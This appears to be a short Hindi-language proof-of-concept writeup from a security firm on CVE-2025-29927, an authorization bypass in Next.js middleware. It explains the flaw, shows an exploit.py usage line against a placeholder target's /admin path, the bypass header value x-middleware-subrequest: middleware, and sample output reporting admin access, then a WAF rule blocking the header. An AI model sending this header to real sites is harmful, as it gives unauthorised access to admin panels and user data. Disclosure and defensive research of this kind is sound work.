
यहाँ CVE-2025-29927 के लिए एक सरल लेकिन प्रभावी एक्सप्लॉइट दिया गया है।
| फ़ील्ड | मान |
|---|
| CVE ID | CVE-2025-29927 |
| गंभीरता | गंभीर (CVSS 9.1) |
| प्रभावित फ्रेमवर्क | Next.js |
| कमजोरी का प्रकार | प्राधिकरण बाईपास |
| शोषण वेक्टर | HTTP अनुरोध हेडर |
| शोषण जटिलता | निम्न |
| प्रमाणीकरण आवश्यक | नहीं |
Next.js एप्लिकेशन अक्सर प्राधिकरण और पहुँच नियंत्रण के लिए मिडलवेयर पर निर्भर करते हैं। यह CVE x-middleware-subrequest हेडर के प्रसंस्करण में एक तर्क दोष से उत्पन्न होता है। जब यह हेडर middleware पर सेट होता है, तो सर्वर गलती से मान सकता है कि अनुरोध आंतरिक तर्क से उत्पन्न हुआ है और मिडलवेयर-आधारित प्रमाणीकरण को बायपास कर सकता है।
यह हमलावरों को बिना किसी क्रेडेंशियल या वैध सत्र के एडमिन पैनल, संरक्षित API या उपयोगकर्ता डेटा तक पहुँचने की अनुमति दे सकता है।
हम यह जाँचने के लिए एक सरल Python स्क्रिप्ट प्रदान करते हैं कि कोई Next.js एप्लिकेशन कमजोर है या नहीं।
python3 exploit.py --url https://target.com --path /admin [--proxy http://127.0.0.1:8080]
[+] Sending request to: https://target.com/admin
[+] Using header: x-middleware-subrequest: middleware
[+] Status Code: 200
[+] Response Body (first 500 chars):
<!DOCTYPE html><html><head>...You are logged in as admin...
x-middleware-subrequest को विश्वास संकेत के रूप में उपयोग करने से बचें।WAF लॉजिक:
if header 'x-middleware-subrequest' == 'middleware':
block_request()
यह PoC हमारे निरंतर कमजोरी अनुसंधान प्रयासों के भाग के रूप में W2H Corp. की आक्रामक सुरक्षा टीम द्वारा विकसित किया गया था। CVE स्पष्टीकरण के लिए मूल पोस्ट यहाँ उपलब्ध है।